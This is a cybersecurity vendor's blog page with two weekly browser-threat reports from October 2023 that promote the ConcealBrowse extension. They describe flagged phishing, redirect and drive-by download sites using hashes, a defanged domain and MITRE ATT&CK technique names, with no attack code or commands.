Conceal’s Weekly Threat Reports are highlights of recently detected sites that were deemed suspicious using our AI-powered browser extension, ConcealBrowse.

ConcealBrowse is leveraged by teams across the world to combat weaponized URLs. The technology is constantly analyzing suspicious web artifacts to identify risks in the form of drive-by attacks, phishing portals, and other threats that materialize while browsing.

Browser-Based Threat Report: Oct. 16

/in /by

Browser-Based Threat Report

Week of October 16th, 2023

ConcealBrowse is leveraged by teams across the world to combat weaponized URLs. The technology is constantly analyzing suspicious web artifacts to identify risks in the form of drive-by attacks, phishing portals, and other threats that materialize while browsing.

At Conceal, your digital safety is our utmost priority. Our weekly threat report for the week of October 16th, 2023, unveils critical insights into the ever-evolving landscape of online threats.

The following report highlights recently detected sites that were deemed suspicious:

SHA-256 42a439f1d2c94a9d456fc25fd9ae758fd1a55b1061d4a9ba5e90406424f3f39c

This URL was detected by ConcealBrowse on October 16th, 2023, with it first being submitted to a handful of CTI feeds on September 21st, 2023.. The URL in question was recently submitted for new analysis on October 15th, 2023. To date, only 4 security vendors excluding ConcealBrowse have annotated this URL.

The link uses various http (insecure) redirects, which leads to gambling sites, spoofed shopping sites, and a suspicious download. More concerning, it also redirects to a QR code, which entices the end user to scan with their mobile device, which are often less secure than our PC’s and laptops. The QR code leads the user to another suspicious webpage that is being tracked by CTI feeds.

Additionally, the serving IP address annotated above has been seen delivering a W32 trojan variant as recently as October 8th, 2023.

_____________

SHA-256 18358a77382e2475a5dcc8445ef23a859d1d7cb698d6b31808f76104cf30fbfd

This web page was detected by ConcealBrowse on October 16th, 2023 with it first being submitted to CTI feeds on August 3rd, 2019. This site shows a continued trend of seeing compromised websites of smaller businesses go at length without being addressed.

When analyzing this site. It was flagged as malicious by multiple different vendors. Further analysis shows that this site contains several signatures including creating files in the system directory.

Several MITRE ATT&CK techniques are also found on this site at the time of analysis to include: Masquerading, Process Injection, Ingress Tools Transfer, Encrypted Channel, Application Layer Protocol, and Non-Application Layer Protocol.

_____________

SHA-256 18358a77382e2475a5dcc8445ef23a859d1d7cb698d6b31808f76104cf30fbfd

This currently active URL was detected by ConcealBrowse on October 16th, 2023. Although it was first submitted to various CTI feeds August 15th, 2023, it was resubmitted the morning of October 17th, meaning the delivered page has been compromised again.

The URL takes users to seemingly benign page offering a free PDF converter. When clicking “Download Now,” users download the converter and inadvertently, a malicious dropper file. The dropper file is a redline trojan variant.

_____________

Valuable Outcomes

ConcealBrowse offers comprehensive protection against a myriad of sophisticated cyber threats, as exemplified in recent threat reports. Our advanced threat detection capabilities have successfully flagged and quarantined malicious web pages, preventing users from falling victim to various cyber attacks. Conceal remains dedicated to upholding the integrity of online interactions, constantly refining our detection algorithms and threat identification protocols to ensure proactive protection against emerging cyber threats. By integrating cutting-edge technology and a robust security infrastructure, we empower users to navigate the digital landscape with confidence, knowing that their online activities are shielded from potential harm.

Join the Conceal Community and claim your FREE ConcealBrowse licenses!

Join the Conceal Community today and fortify your online security for free! Don’t miss the chance to benefit from our advanced threat protection and stay one step ahead of cybercriminals. Experience peace of mind while browsing the internet, knowing that ConcealBrowse is your shield against the ever-evolving threat landscape. Take the proactive step towards a safer online experience – get your free ConcealBrowse license now and join a community that’s committed to safeguarding your digital world.

Sign up for the Conceal Community and claim your free licenses by completing the form below.


Browser-Based Threat Report: Oct. 2

/in /by

Browser-Based Threat Report

Week of October 2nd, 2023

ConcealBrowse is leveraged by teams across the world to combat weaponized URLs. The technology is constantly analyzing suspicious web artifacts to identify risks in the form of drive-by attacks, phishing portals, and other threats that materialize while browsing.

In today’s digital landscape, threats to online security are ever-evolving, and staying one step ahead of malicious actors is essential. ConcealBrowse is your trusted partner in the battle against cyber threats. Our advanced threat detection and prevention system uncovered a severe security risk on September 20th, 2023, and we have been at the forefront of safeguarding online experience ever since.

The following report highlights recently detected sites that were deemed suspicious:

This web page was detected by ConcealBrowse on September 20th, 2023, with it first being submitted to various CTI feeds on March 20th, 2023. The page was recently submitted for analysis on September 21st, 2023, indicating that the page is continuously compromised to serve malicious content.

The compromised site was conducting drive-by downloads via embedded JavaScript files, delivering an HTML file with a sha256
of 0d3e98ca727fc1201b436170af5a63f23348aaf146a3ac6234f6c4da283e8b34.

Using various MITRE ATT&CK techniques to Evade Detection via process injection and conduct Command and Control via ingress tool transfer, the adversary can deliver the suspected credential harvesting HTML file and export the user supplied credentials.

_____________

This web page was detected by ConcealBrowse on September 29th, 2023 with it first being submitted to CTI feeds on December 29th, 2015. The page was most recently submitted September 23rd, 2023 due it’s continued nefarious activities. The page contains a redirect to hxxp:// survey-smiles[.]com that is delivering an HTML file with the sha256 of 10dbbd006c5099d6e4f1302ffb0bd95885c0b4caf4107de725b73c08bdb8a39d.

Upon further analysis of the original URL, it was identified to be a referred URL inside the strings of the njRAT-master trojan
(SHA-256: c6c2f7f109ce90b2874266c2dfea905bdca745dfac3922d674922de476109d30).

Finally, the hosting IP address has been reportedly communicating with various Win32 EXE files that are redirecting victims to a spoofed PayPal page, reinstalling adware, and delivering trojans amongst other malicious activities. Other URLs hosted on the same IP address are currently delivering malicious payloads and are actively phishing.

_____________

This currently active page was detected by ConcealBrowse on September 28th, 2023 with it first being submitted to various CTI feeds later that same day. When the page is loaded, it leads victims to a spoofed Microsoft login page that entices users to divulge their credentials. Fortunately, ConcealBrowse detected the page and not only sent it to isolation, but also prevented the user from entering in their password, as seen below.

_____________

Valuable Outcomes

ConcealBrowse offers comprehensive protection against a myriad of sophisticated cyber threats, as exemplified in recent threat reports. Our advanced threat detection capabilities have successfully flagged and quarantined malicious web pages, preventing users from falling victim to various cyber attacks. Conceal remains dedicated to upholding the integrity of online interactions, constantly refining our detection algorithms and threat identification protocols to ensure proactive protection against emerging cyber threats. By integrating cutting-edge technology and a robust security infrastructure, we empower users to navigate the digital landscape with confidence, knowing that their online activities are shielded from potential harm.

Join the Conceal Community and claim your FREE ConcealBrowse licenses!

Join the Conceal Community today and fortify your online security for free! Don’t miss the chance to benefit from our advanced threat protection and stay one step ahead of cybercriminals. Experience peace of mind while browsing the internet, knowing that ConcealBrowse is your shield against the ever-evolving threat landscape. Take the proactive step towards a safer online experience – get your free ConcealBrowse license now and join a community that’s committed to safeguarding your digital world.

Join us today, and together, let’s make the internet a safer place.